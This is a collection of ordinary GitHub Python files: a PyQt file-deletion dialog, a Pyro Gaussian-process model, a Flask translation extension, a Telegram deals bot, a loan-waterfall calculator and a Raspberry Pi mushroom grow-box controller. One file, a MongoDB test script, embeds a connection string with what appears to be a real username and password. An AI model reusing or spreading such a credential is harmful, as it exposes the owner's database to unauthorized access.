+{"seq_id":"18230946830","text":"#-*- coding: utf-8-*-\n__author__ = 'Aaron'\nimport sys\nimport os\nfrom PyQt4 import QtGui\nfrom delf import Ui_delform\n\nclass delf(QtGui.QDialog,Ui_delform):\n    def __init__(self,parent =None):\n        super(delf, self).__init__(parent)\n        self.setupUi(self)\n        self.show()\n        self.start()\n        self.finebtn.clicked.connect(self.finish)\n        iconop = QtGui.QIcon()\n        iconop.addPixmap(QtGui.QPixmap(\"icons/delete.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n        self.delbtn.setIcon(iconop)\n\n\n    def finish(self):\n        QtGui.QMessageBox.information(None, u\"成功\",\n                                      u\"名單刪除成功,\\n請重新啟動程式\",\n                                      QtGui.QMessageBox.Ok | QtGui.QMessageBox.Default,\n                                      QtGui.QMessageBox.NoButton)\n\n        self.close()\n\n    def start(self):\n        model = QtGui.QStandardItemModel(self.listView)\n        cwd = os.getcwdu()\n        # print cwd\n        self.storelocation = os.path.join(cwd,\"namelist\")\n        fs = os.listdir(self.storelocation)\n        for f in fs:\n            item = QtGui.QStandardItem(f)\n            model.appendRow(item)\n        self.listView.setModel(model)\n        self.delbtn.clicked.connect(self.delaction)\n\n    def delaction(self):\n        for index in self.listView.selectedIndexes():\n            a = unicode(index.data().toString())\n            import os\n            rmf = os.path.join(self.storelocation,a)\n            os.remove(rmf)\n        self.start()\n\n\n\n\nif __name__ ==\"__main__\":\n    app = QtGui.QApplication(sys.argv)\n    window = delf()\n    sys.exit(app.exec_())","repo_name":"wlhunag/Random_pick","sub_path":"Delname.py","file_name":"Delname.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"26031938695","text":"import torch\nimport pyro\nimport pyro.distributions as dist\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport logging\nimport pyro.contrib.gp as gp\n\nfrom torch.distributions import biject_to\n\nfrom .abstract_model import AbstractModel\nfrom .pyro_extensions.guides import AutoSLPNormalReparamGuide\n\n\nclass GPKernelLearning(AbstractModel):\n    does_lppd_evaluation = True\n    slps_identified_by_discrete_samples = True\n\n    input_dim = 1\n\n    def __init__(self, data_path, jitter=1e-6):\n        self.X, self.y, self.X_val, self.y_val = self.load_data(data_path)\n\n        self.jitter = jitter\n\n    @staticmethod\n    def load_data(data_path):\n        data = torch.tensor(np.loadtxt(data_path, delimiter=\",\"))\n        xs = data[:, 0]\n        ys = data[:, 1]\n        xs -= xs.min()\n        xs /= xs.max()\n        ys -= ys.mean()\n        ys *= 4 / (ys.max() - ys.min())\n\n        # Keep 10 % of data for validation.\n        val_ix = round(xs.size(0) * 0.9)\n        xs, xs_val = xs[:val_ix], xs[val_ix:]\n        ys, ys_val = ys[:val_ix], ys[val_ix:]\n\n        return xs, ys, xs_val, ys_val\n\n    def sample_kernel_fn(self, address_prefix: str) -> gp.kernels.Kernel:\n        kernel_type = pyro.sample(\n            
f\"{address_prefix}kernel_type\",\n            dist.Categorical(torch.tensor([0.2, 0.2, 0.2, 0.2, 0.1, 0.1])),\n            infer={\"branching\": True},\n        )\n\n        if kernel_type == 0.0:\n            # Rational Quadratic kernel\n            rq_kernel = gp.kernels.RationalQuadratic(\n                input_dim=self.input_dim,\n            )\n            rq_kernel.lengthscale = pyro.nn.PyroSample(dist.InverseGamma(2.0, 1.0))\n            rq_kernel.scale_mixture = pyro.nn.PyroSample(dist.InverseGamma(2.0, 1.0))\n            return rq_kernel\n        elif kernel_type == 1.0:\n            # Linear kernel\n            linear_kernel = gp.kernels.Polynomial(input_dim=self.input_dim, degree=1)\n            linear_kernel.bias = pyro.nn.PyroSample(dist.InverseGamma(2.0, 1.0))\n            return linear_kernel\n        elif kernel_type == 2.0:\n            # Squared Exponential kernel\n            rbf_kernel = gp.kernels.RBF(\n                input_dim=self.input_dim,\n            )\n            rbf_kernel.lengthscale = pyro.nn.PyroSample(dist.InverseGamma(2.0, 1.0))\n            return rbf_kernel\n        elif kernel_type == 3.0:\n            # Periodic\n            periodic_kernel = gp.kernels.Periodic(\n                input_dim=self.input_dim,\n                variance=torch.tensor(1.0),\n            )\n            periodic_kernel.lengthscale = pyro.nn.PyroSample(\n                dist.InverseGamma(2.0, 1.0)\n            )\n            periodic_kernel.period = pyro.nn.PyroSample(dist.InverseGamma(2.0, 1.0))\n            return periodic_kernel\n        elif kernel_type == 4.0:\n            # Sum\n            left_child = self.sample_kernel_fn(f\"{address_prefix}sum_left_\")\n            right_child = self.sample_kernel_fn(f\"{address_prefix}sum_right_\")\n            return gp.kernels.Sum(left_child, right_child)\n        elif kernel_type == 5.0:\n            # Product\n            left_child = self.sample_kernel_fn(f\"{address_prefix}times_left_\")\n            right_child = self.sample_kernel_fn(f\"{address_prefix}times_right_\")\n            return gp.kernels.Product(left_child, right_child)\n        else:\n            raise ValueError(f\"Unknown kernel type: {kernel_type}\")\n\n    def __call__(self):\n        # Sample kernel function\n        kernel_fn = self.sample_kernel_fn(\"\")\n\n        std = pyro.sample(\"std\", dist.HalfNormal(1))\n\n        # Create covariance matrix\n        N = self.X.size(0)\n        Kff = kernel_fn(self.X)\n        # The constant kernel has problems because it uses .expand() internally.\n        # To avoid the problem we need to clone the covariance matrix.\n        Kff = Kff.type(self.X.dtype).clone()\n        Kff.view(-1)[:: N + 1] += self.jitter + torch.pow(\n            std, 2\n        )  # add noise to diagonal\n        Lff = torch.linalg.cholesky(Kff)\n\n        zero_loc = self.X.new_zeros(N)\n        pyro.sample(\"y\", dist.MultivariateNormal(zero_loc, scale_tril=Lff), obs=self.y)\n\n        # Sample data from standard normal\n        return kernel_fn\n\n    def make_parameter_plots(self, results, guide, branching_trace, file_prefix):\n        if isinstance(guide, AutoSLPNormalReparamGuide):\n            means = results[\"loc\"]\n            scale = [np.exp(v) for v in results[\"log_scale\"]]\n        else:\n            logging.info(f\"Parameter plotting for guide {guide} not supported.\")\n            return\n\n        means = [\n            [(site, v) for site, v in guide._unpack_latent(torch.tensor(cm))]\n            for cm in means\n        ]\n        scale = [\n            [(site, v) for site, v in guide._unpack_latent(torch.tensor(cs))]\n            for cs in scale\n        ]\n        num_params = len(means[-1])\n\n        # Plot final distributions\n        fig, axs = plt.subplots(num_params, 1, figsize=(10, 4 * num_params))\n        for ix in range(num_params):\n            site = means[-1][ix][0]\n            transform = biject_to(site[\"fn\"].support)\n\n            mean, std = means[-1][ix][1], scale[-1][ix][1]\n            q_dist = dist.Normal(mean, std)\n            xs = torch.linspace(mean - 3 * std, mean + 3 * std, 100)\n            constrained_xs = transform(xs)\n            log_densities = q_dist.log_prob(xs) + transform.inv.log_abs_det_jacobian(\n                constrained_xs, xs\n            )\n            axs[ix].plot(constrained_xs, log_densities.exp())\n            axs[ix].set_title(site[\"name\"])\n\n        
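# lay out and save the final-marginal figure before moving on to the mean-evolution plots\n        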
fig.tight_layout()\n fig.savefig(f\"{file_prefix}_final_marginals.jpg\")\n\n # Plot evolution of the means\n fig, axs = plt.subplots(num_params, 1, figsize=(10, 4 * num_params))\n for ix in range(num_params):\n site = means[0][ix][0]\n transform = biject_to(site[\"fn\"].support)\n\n param_means = torch.tensor([x[ix][1] for x in means])\n constrained_param_means = transform(param_means)\n axs[ix].plot(constrained_param_means)\n axs[ix].set_title(f\"{site['name']} mean\")\n axs[ix].set_xlabel(\"Iteration\")\n axs[ix].set_ylabel(\"Value\")\n\n fig.tight_layout()\n fig.savefig(f\"{file_prefix}_params.jpg\")\n plt.close(\"all\")\n\n def evaluation(self, posterior_samples, ground_truth_weights=None):\n post_kernels = self.extract_posterior_kernels(posterior_samples)\n noises = [trace.nodes[\"std\"][\"value\"] for trace in posterior_samples]\n\n log_p = torch.tensor(0.0)\n for kernel_fn, noise in zip(post_kernels, noises):\n gp_mean, gp_cov = self.gp_analytic_posterior(\n kernel_fn, self.X, self.X_val, self.y, noise, self.jitter, full_cov=True\n )\n log_p += (\n dist.MultivariateNormal(gp_mean, gp_cov).log_prob(self.y_val).detach()\n )\n\n return log_p / len(posterior_samples)\n\n def plot_posterior_samples(self, posterior_samples, fname):\n post_kernels = self.extract_posterior_kernels(posterior_samples)\n noises = [trace.nodes[\"std\"][\"value\"] for trace in posterior_samples]\n\n new_xs = torch.linspace(0, 1, 500)\n posterior_fs = torch.zeros((len(post_kernels), new_xs.size(0)))\n gp_means = torch.zeros((len(post_kernels), new_xs.size(0)))\n gp_vars = torch.zeros((len(post_kernels), new_xs.size(0)))\n for ix in range(len(post_kernels)):\n with torch.no_grad():\n gp_post_mean, gp_post_cov = self.gp_analytic_posterior(\n post_kernels[ix],\n self.X,\n new_xs,\n self.y,\n noises[ix],\n self.jitter,\n full_cov=True,\n )\n posterior_fs[ix, :] = (\n dist.MultivariateNormal(gp_post_mean, gp_post_cov).sample().detach()\n )\n\n f_post_mean = posterior_fs.mean(dim=0)\n f_post_std = posterior_fs.std(dim=0)\n\n fig, ax = plt.subplots(figsize=(15, 10))\n ax.plot(new_xs, f_post_mean, label=\"Post mean\", color=\"red\")\n ax.fill_between(\n new_xs,\n f_post_mean - 2 * f_post_std,\n f_post_mean + 2 * f_post_std,\n color=\"red\",\n alpha=0.2,\n )\n num_samples_to_plot = min(5, len(post_kernels))\n for ix in range(num_samples_to_plot):\n ax.plot(new_xs, posterior_fs[ix, :], color=\"green\", alpha=0.3)\n\n ax.scatter(self.X, self.y, label=\"Data\", color=\"black\")\n ax.scatter(self.X_val, self.y_val, label=\"Held-out data\")\n ax.set_xlim((-0.01, 1.01))\n ax.legend(loc=\"upper left\")\n fig.savefig(fname)\n plt.close(\"all\")\n\n @staticmethod\n def extract_posterior_kernels(posterior_samples):\n post_kernels = [trace.nodes[\"_RETURN\"][\"value\"] for trace in posterior_samples]\n for ix in range(len(post_kernels)):\n for name, s in posterior_samples[ix].iter_stochastic_nodes():\n if name in [\"std\", \"y\"] or \"kernel_type\" in name:\n continue\n\n if isinstance(post_kernels[ix], gp.kernels.Sum) or isinstance(\n post_kernels[ix], gp.kernels.Product\n ):\n names = name.split(\".\")\n kern_mod = post_kernels[ix]._modules[names[0]]\n for jx in range(len(names) - 2):\n kern_mod = kern_mod._modules[names[jx + 1]]\n setattr(kern_mod, names[-1], s[\"value\"])\n else:\n setattr(post_kernels[ix], name, s[\"value\"])\n return post_kernels\n\n @staticmethod\n def gp_analytic_posterior(\n kernel_fn: gp.kernels.Kernel,\n X: torch.tensor,\n new_xs: torch.tensor,\n y: torch.tensor,\n noise: torch.tensor,\n jitter: float,\n 
full_cov: bool = False,\n ):\n N = X.size(0)\n Kff = kernel_fn(X).contiguous()\n Kff = Kff.type(X.dtype).clone()\n Kff.view(-1)[:: N + 1] += jitter + torch.pow(noise, 2)\n Lff = torch.linalg.cholesky(Kff)\n\n gp_post_mean, gp_post_cov = gp.util.conditional(\n new_xs, X, kernel_fn, y, Lff=Lff, jitter=jitter, full_cov=full_cov\n )\n if full_cov:\n M = new_xs.size(0)\n gp_post_cov = gp_post_cov.contiguous()\n gp_post_cov.view(-1, M * M)[:, :: M + 1] += torch.pow(noise, 2)\n else:\n gp_post_cov = gp_post_cov + torch.pow(noise, 2)\n return gp_post_mean, gp_post_cov","repo_name":"treigerm/sdvi_neurips","sub_path":"models/gp_kernel_learning.py","file_name":"gp_kernel_learning.py","file_ext":"py","file_size_in_byte":10578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31611851418","text":"from __future__ import absolute_import\n# encoding: UTF-8\n__author__ = 'xepa4ep'\n\nimport os\nimport re\nfrom json import dumps\nfrom flask import request\nfrom tml.config import CONFIG\nfrom . import translator\nfrom .tml_cookies import TmlCookieHandler\n\n\npj = os.path.join\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\nclass Tml(object):\n\n app = None\n _default_locale = None\n _config = None\n\n\n def __init__(self, app=None, default_locale='en', configure_jinja=True):\n self._default_locale = default_locale\n self._configure_jinja = configure_jinja\n self.app = app\n self.__before_response = set()\n if app is not None:\n self.init_app(app)\n\n def init_app(self, app):\n \"\"\"Set up this instance for use with *app*, if no app was passed to\n the constructor.\n \"\"\"\n self.app = app\n app.tml_instance = self\n if not hasattr(app, 'extensions'):\n app.extensions = {}\n app.extensions['tml'] = self\n\n app.config.setdefault('TML_DEFAULT_LOCALE', self._default_locale)\n self._config = app.config['TML']\n self._config['logger'] = {}\n self._config['logger']['path']= pj(BASE_DIR, 'logs', 'tml.log')\n\n self.locale_selector_func = None\n\n if self._configure_jinja:\n app.jinja_env.add_extension('jinja2.ext.i18n')\n app.jinja_env.add_extension('tml_jinja2.ext.TMLExtension')\n app.jinja_env.install_gettext_callables(\n lambda x: translator.Translation.instance().ugettext(x),\n lambda s, p, n: translator.Translation.instance().ngettext(s, p, n),\n newstyle=True\n )\n app.jinja_env.install_tr_callables(\n tr=translator.Translation.instance(tml_settings=self._config).tr)\n\n app.before_request(self.activate_tml)\n app.after_request(self.deactivate_tml)\n app.after_request(self.agent_inject)\n self._previous_locale = None\n\n def ignore_tml(self):\n return not request.endpoint or request.endpoint == 'static'\n\n def activate_tml(self):\n if self.ignore_tml(): # ignore initialization of sdk\n return\n source = '%s' % (request.url_rule.endpoint)\n self.translation = translator.Translation.instance(tml_settings=self._config)\n cookie_handler = TmlCookieHandler(request, self.translation.application_key)\n locale = self.translation.get_language_from_request(\n request, cookie_handler, self.app.config)\n if locale != self._previous_locale: # force template cache invalidation\n if self.app.jinja_env.cache:\n self.app.jinja_env.cache.clear()\n self.translation.activate_tml(\n source=source,\n access_token=cookie_handler.tml_access_token,\n translator=cookie_handler.tml_translator,\n locale=locale,\n force_context=True)\n return None\n\n def deactivate_tml(self, response):\n if self.ignore_tml(): # ignore initialization of sdk\n 
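# static endpoints never activated tml, so there is nothing to tear down here\n            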
return response\n        while self.translation._before_response:\n            fn = self.translation._before_response.pop()\n            fn(response)\n        self._previous_locale = self.translation.locale\n        translator.Translation.instance().deactivate_all()\n        self.request = None\n        self.translation = None\n        return response\n\n    def agent_inject(self, response):\n        if self.ignore_tml(): # ignore initialization of sdk\n            return response\n\n        agent_config = CONFIG.get('agent', {})\n        if not agent_config['force_injection']:\n            return response\n\n        if agent_config['enabled'] and agent_config['force_injection']:\n            data = response.data\n            pattern = re.compile(b'</body>', re.IGNORECASE)\n            agent_script = self.app.jinja_env.from_string(\"{% tml_inline 'middleware' %}\").render()\n            response.data = pattern.sub(bytes(agent_script) + b'</body>', response.data)\n            response.headers['Content-Length'] = len(response.data)\n\n        return response\n","repo_name":"translationexchange/tml-python-flask","sub_path":"flask_tml/tml.py","file_name":"tml.py","file_ext":"py","file_size_in_byte":4155,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"}
+{"seq_id":"35984018781","text":"import pymongo\nimport datetime\n\n# Replace the uri string with your MongoDB deployment's connection string.\nconn_str = \"mongodb+srv://Kismet:wZ0vNyvkUENVhg2o@kind-words-cluster.l8p7d.mongodb.net/myFirstDatabase?retryWrites=true&w=majority\"\n\n# set a 5-second connection timeout\nclient = pymongo.MongoClient(conn_str, serverSelectionTimeoutMS=5000)\ndb = client['kind_words-database']\nkw_coll = db['kind-words-collection']\n# req_coll = db['requests-collection']\n# user_coll = db['users-collection']\npost = {\"author\": \"Mike\",\n        \"text\": \"My first blog post!\",\n        \"tags\": [\"mongodb\", \"python\", \"pymongo\"],\n        \"date\": datetime.datetime.utcnow()}\nkw_coll.insert_one(post)\n\ntry:\n    print('connected to mongoDB')\nexcept Exception:\n    print(\"Unable to connect to the server.\")","repo_name":"johnkismet/kind_words_slack","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"7898818165","text":"from app.logger import getLogger\nfrom datetime import datetime, timedelta\nfrom app.db.database import Database\nfrom telethon import TelegramClient\nfrom telethon.tl.tlobject import TLObject\nimport time\nfrom app.utils import Utils\nfrom app.config.config import Config\nfrom app.models import TelegramMessageModel, TypeDealsModel\nfrom apscheduler.schedulers.asyncio import AsyncIOScheduler\nfrom apscheduler.triggers import interval, date as datetrigger\nfrom apscheduler.events import (\n    EVENT_ALL,\n    EVENT_JOB_ERROR,\n    EVENT_JOB_EXECUTED,\n    EVENT_JOB_SUBMITTED,\n    EVENT_JOB_ADDED,\n)\nfrom app.generators import image_util\nfrom app.messages.message_system import MessageQueue\n\n\nconfig = Config.get_instance()\nbot = TelegramClient(\"bot\", config.api_id, config.api_hash).start(\n    bot_token=config.bot_token\n)\n\nscheduler = AsyncIOScheduler()\nlog = getLogger(\"TELEBOT\")\nmessageQueue = MessageQueue.get_instance()\n\n\nasync def message_system():\n    job = scheduler.get_job(\"telegram\")\n    if not job or not job.trigger:\n        log.info(\n            \"Job not found - I assume the last run deleted the whole scheduling. 
Rescheduling.\"\n )\n triggers = interval.IntervalTrigger(\n minutes=Utils.delayBetweenTelegramMessages()\n )\n scheduler.add_job(\n message_system,\n trigger=triggers,\n max_instances=1,\n id=\"telegram\",\n next_run_time=datetime.now(),\n )\n if not Utils.can_run():\n log.info(\"Cannot run because it's not between start_hour and end_hour\")\n startHour = config.telegram_start_hour\n endHour = config.telegram_end_hour\n today = datetime.today()\n if startHour and startHour < endHour:\n scheduledTime = datetime(\n year=today.year,\n month=today.month,\n day=today.day,\n hour=startHour,\n minute=0,\n second=0,\n )\n if today.hour > startHour:\n scheduledTime = scheduledTime + timedelta(days=1)\n dateTrigger = datetrigger.DateTrigger(scheduledTime)\n job.reschedule(dateTrigger)\n elif endHour and endHour < startHour:\n scheduledTime = datetime(\n year=today.year,\n month=today.month,\n day=today.day,\n hour=endHour,\n minute=0,\n second=0,\n )\n dateTrigger = datetrigger.DateTrigger(scheduledTime)\n job.reschedule(dateTrigger)\n log.info(f\"Rescheduling the job to {job.next_run_time}\")\n return\n\n db = Database()\n channel_type = config.telegram_type_id\n channel_id = config.telegram_id\n while messageQueue.isLock():\n time.sleep(10)\n valid_deal = messageQueue.nextElem()\n if valid_deal:\n await send_message(\n deal=valid_deal,\n database=db,\n channel_type=channel_type,\n channel_id=channel_id,\n save_on_db=True,\n )\n next_run = datetime.now() + timedelta(\n minutes=Utils.delayBetweenTelegramMessages()\n )\n log.info(\n \"Next post at {next_run}\".format(\n next_run=next_run.strftime(\"%Y/%m/%d %H:%M:%S\")\n )\n )\n else:\n # Send message to admin\n log.info(\n \"I couldn't retrieve any new valid deals. Think about changing your filters\"\n )\n\n\nasync def send_message(\n deal: TypeDealsModel,\n database: Database,\n channel_type: TLObject,\n channel_id: int,\n save_on_db: bool = True,\n):\n _deal = deal.deal\n path = image_util.create_image(\n originalPrice=_deal.originalPrice,\n dealPrice=_deal.dealPrice,\n imageUrl=_deal.imageUrl,\n save_as=_deal.id,\n currency=\"€\"\n )\n if save_on_db:\n database.upsertDeal(deal)\n msg = await bot.send_file(\n channel_type, file=path, caption=Utils.message(deal), force_document=False,\n )\n if save_on_db:\n database.upsertTelegramMessage(\n TelegramMessageModel(id=msg.id, channel_id=channel_id, datetime=msg.date),\n deal,\n )\n image_util.delete_tmp_image(path)\n\n\ndef listener_for_telegram(event):\n if event.code == EVENT_JOB_ERROR:\n print(\"The job crashed :(\")\n scheduler.shutdown(wait=False)\n elif event.code == EVENT_JOB_ADDED:\n log.info(\"Job Added. Ready to be executed\")\n elif event.code == EVENT_JOB_SUBMITTED:\n log.info(\"Job Starting...\")\n elif event.code == EVENT_JOB_EXECUTED:\n log.info(\"Job Finished. 
Waiting for next run\")\n\n\ndef start():\n    log.info(\"TELEBOT STARTED\")\n    log.info(\"Adding event listener for issue\")\n    scheduler.add_listener(listener_for_telegram, EVENT_ALL | EVENT_JOB_ERROR)\n    rangeTime = (\n        f\"{config.telegram_start_hour}\" if config.telegram_start_hour else \"\"\n    ) + (f\"-{config.telegram_end_hour}\" if config.telegram_end_hour else \"\")\n    log.info(f\"Range Time of Working Hours: {rangeTime}\")\n    triggers = interval.IntervalTrigger(minutes=Utils.delayBetweenTelegramMessages())\n    log.info(\"Creating the Scheduler\")\n    scheduler.add_job(\n        message_system,\n        trigger=triggers,\n        max_instances=1,\n        id=\"telegram\",\n        next_run_time=datetime.now(),\n    )\n    log.info(\"Scheduler Started\")\n    scheduler.start()\n    bot.loop.run_forever()\n\n\nif __name__ == \"__main__\":\n    log.info(\"**HELLO**\")\n    start()\n","repo_name":"antoniocali/deals-bot","sub_path":"app/telegram/telebot.py","file_name":"telebot.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"74128294293","text":"\nfrom Tranche import Tranche\n\n\ndef doWaterfall(loanPool, structuredSecurity):\n    \"\"\"\n    parameter: a LoanPool object and a StructuredSecurities object\n    doWaterfall function will loop through time periods, starting from 0, and keep going until the LoanPool has no\n    more active loans\n    After the loop completes, the function will return all the results saved down from the getWaterfall function\n    (on both asset side and liabilities side)\n    get a list of IRR of all tranches, a list of DIRR of all tranches, a list of AL of all tranches\n    \"\"\"\n\n    # reset loans in loanPool and tranches in structuredSecurity\n    for tranche in structuredSecurity.args:\n        tranche.reset()\n    for loan in loanPool.args:\n        loan.reset()\n\n    # get the maximum period until the LoanPool has no more active loans\n    mp = max([loan.term for loan in loanPool.args])\n\n    paymentDict = {}\n    PrincipalPaymentDict = {}\n    for num, tranche in enumerate(structuredSecurity.args):\n        paymentDict[num] = []\n        PrincipalPaymentDict[num] = []\n\n    lwf = []\n    swf = []\n    cashLeft = []\n\n    for i in range(1, mp+1):\n        # call checkDefaults on the LoanPool to check whether loans in the loan pool default\n        loanPool.checkDefaults(i)\n\n        # Ask the LoanPool for its total payment for the current time period\n        totalPayment = loanPool.totalPaymentDue(i)\n\n        # Ask the LoanPool for its total principal payment for the current time period\n        totalPrincipalPayment = loanPool.totalPrincipalDue(i)\n\n        # Increase the time period on the StructuredSecurities object\n        structuredSecurity.increasePeriod()\n\n        # Pay the StructuredSecurities with the amount provided by the LoanPool.\n        structuredSecurity.makePayments(totalPayment, totalPrincipalPayment)\n\n        # Call getWaterfall on both the LoanPool and StructuredSecurities objects and save the info into two variables.\n        lwf.append(loanPool.getWaterfall(i))\n        z = structuredSecurity.getWaterfall()[0]\n        swf.append(structuredSecurity.getWaterfall()[0])\n        cashLeft.append(structuredSecurity.getWaterfall()[1])\n\n        for num, tranche in enumerate(z):\n            # get payment (sum of interest payment and principal payment) of period i\n            paymentDict[num].append(tranche[1]+tranche[3])\n            # get principal payment of period i\n            PrincipalPaymentDict[num].append(tranche[3])\n\n    # calculate IRR and DIRR\n    # get list of total payment (a list of lists; each inner list holds one tranche's payments across all periods)\n    paymentList = list(paymentDict.values())\n    # get list of notional\n    
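# e.g. a hypothetical two-tranche 70/30 deal would give notionalList = [700000.0, 300000.0]\n    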
notionalList = [tranche.notional for tranche in structuredSecurity.args]\n    # get list of tranche rate\n    rateList = [tranche.rate for tranche in structuredSecurity.args]\n    # calculate IRR using method in Tranche Class, it will return a list of IRR of all tranches\n    # calculate DIRR using method in Tranche Class, it will return a list of DIRR of all tranches\n    irrList = []\n    dirrList = []\n    for num, payment in enumerate(paymentList):\n        irrList.append(Tranche.irr(notionalList[num], paymentList[num]))\n        dirrList.append(Tranche.dirr(rateList[num], notionalList[num], paymentList[num]))\n\n    # calculate AL\n    # get list of principal payment\n    # (a list of lists; each inner list holds one tranche's principal payments across all periods)\n    principalPaymentList = list(PrincipalPaymentDict.values())\n    # calculate AL using method in Tranche Class, it will return a list of AL of all tranches\n    alList = []\n    for num, principalPayment in enumerate(principalPaymentList):\n        alList.append(Tranche.al(notionalList[num], principalPaymentList[num]))\n\n    return lwf, swf, cashLeft, irrList, dirrList, alList\n","repo_name":"wrch0712/abs-modeling","sub_path":"doWaterfall.py","file_name":"doWaterfall.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"17590186142","text":"import os\nimport RPi.GPIO as io\nimport json\nimport datetime as dt\nimport writeGrowBoxDates as writeDate\nimport relay\nimport time\nimport sendEmail\n\n#######################################################################################\n#Constants\n#######################################################################################\n#variable for who the notifications for the growbox should be sent to\nemailRecipients = \"just me\"\ntimeOfGrowth = 2 # of weeks the mushrooms will sit in the chamber\ncycleStatus = \"cycleStatus\" #this is added to the full data to indicate if the mushrooms are done or not\n\n#######################################################################################\n#pin setup\n#######################################################################################\nstartButtonPin = 27\nwaterEmptyPin = 25\nwaterFullPin = 6\nredLEDPin = 20 # on if temperature out of range\nblueLEDPin = 19 # on if humidity water level low\nyellowLEDPin = 21 # on if humidity out of range\ngreenLEDPin = 13 # on while grow cycle is in action\nTHSensorLCDPin = 24\nTHSensorWebsitePin = 23\nhumidifierControlPin = 22\nsunlightPin = 5\n\n#######################################################################################\n#Setup GPIO\n#######################################################################################\nio.setwarnings(False)\nio.setmode(io.BCM)\nio.setup(waterEmptyPin, io.IN, pull_up_down=io.PUD_DOWN)\nio.setup(waterFullPin, io.IN, pull_up_down=io.PUD_DOWN)\n\n#######################################################################################\n#Function Definitions\n#######################################################################################\n#function to notify user that the mushroom humidifier needs to be refilled\ndef waterIsLow(channel):\n    #Turn Blue indicator LED on\n    relay.relayOnOff(blueLEDPin, \"on\")\n    \n    message = \"\"\"\n    Subject: Mushroom Water level is Low\n    The Digital water level sensor was triggered, Refill the mushroom humidifier water.\n    \"\"\"\n\n    #send email\n    sendEmail.sendEmail(emailRecipients, message)\n\n#function to turn off blue indicator LED\ndef waterIsHigh(channel):\n    
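#water level restored: clear the blue low-water indicator LED\n    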
relay.relayOnOff(blueLEDPin, \"off\")\n\n#######################################################################################\n#Setup Interrupt pins\n#######################################################################################\n#Setup interrupt for digital water level sensor \nio.add_event_detect(waterEmptyPin, io.RISING, callback=waterIsLow, bouncetime=300)\nio.add_event_detect(waterFullPin, io.FALLING, callback=waterIsHigh, bouncetime=300)\n\n#######################################################################################\n#store the current date and calculate finished date\n#######################################################################################\nstartDate = dt.datetime.now()\nendDate = startDate + dt.timedelta(weeks=timeOfGrowth)\nwriteDate.addDateToData(\"startDate\", startDate.strftime(\"%c\")) #the strftime(\"%c\") will print as \"Tue Apr 30 19:41:43 2019\" for example\nwriteDate.addDateToData(\"endDate\", endDate.strftime(\"%c\")[0:10]) #just using the [0:10] shortens it to \"Tue Apr 30\"\n#write the start and end date to single file (the LCD code will use this so it can read the dates quickly and easily)\ndates = {\"startDate\": startDate.strftime(\"%c\")[0:10], \"endDate\": endDate.strftime(\"%c\")[0:10], \"cycleStatus\": \"in use\"}\nwith open(\"dates.json\", \"w\") as outfile:\n    json.dump(dates, outfile)\n\n#######################################################################################\n#turn on green LED to indicate the grow cycle has started\n#and\n#tell the data in the website that the mushrooms are currently in the chamber for the three week cycle\n#######################################################################################\nrelay.relayOnOff(greenLEDPin, \"on\")\nwriteDate.addDateToData(cycleStatus, \"in use\") #the website can use this\n\n#######################################################################################\n#Continuous loop while mushrooms sit in the chamber (just sunlight LED control)\n#######################################################################################\ndaysPast = 0\nwhile daysPast < 3*7: #until 3 weeks have passed, keep turning on and off the sunlight in this loop\n    hour = 60*60 #one hour in seconds\n\n    onTime = 18 * hour # on time is 18 hours\n    offTime = 6 * hour # off time is 6 hours\n\n    #turn on sunlight (uses inverted logic because of relay)\n    relay.relayOnOff(sunlightPin, \"off\")\n    time.sleep(onTime)\n\n    #turn off sunlight (uses inverted logic because of relay)\n    relay.relayOnOff(sunlightPin, \"on\")\n    time.sleep(offTime)\n\n    daysPast = daysPast + 1\n\n#######################################################################################\n#end of growth cycle, turn stuff off\n#######################################################################################\n#turn off green LED to indicate the grow cycle is over\nrelay.relayOnOff(greenLEDPin, \"off\")\n\n#######################################################################################\n#tell the full data file that the mushrooms are not in the fruiting cycle anymore\n#######################################################################################\nwriteDate.addDateToData(cycleStatus, \"Done\")\n\n#tell that small file that the mushroom grow cycle is over(the LCD code will use this so it can read the dates quickly and easily)\ndates[\"cycleStatus\"] = \"waiting for next batch\" #update the dictionary\nwith open(\"dates.json\", \"w\") as outfile:\n    json.dump(dates, 
outfile)\n\n#######################################################################################\n#Email the user that the mushies are ready\n#######################################################################################\nmushroomEmailMessage = \"\"\"\nSubject: Mushrooms Ready\nHey! your mushrooms are ready for harvesting, Come Get em!\n\"\"\"\n \nsendEmail.sendEmail(emailRecipients, mushroomEmailMessage)\n \n\n\n\n\n","repo_name":"deereeco/GrowBox","sub_path":"Code/startGrowthCycle.py","file_name":"startGrowthCycle.py","file_ext":"py","file_size_in_byte":6063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
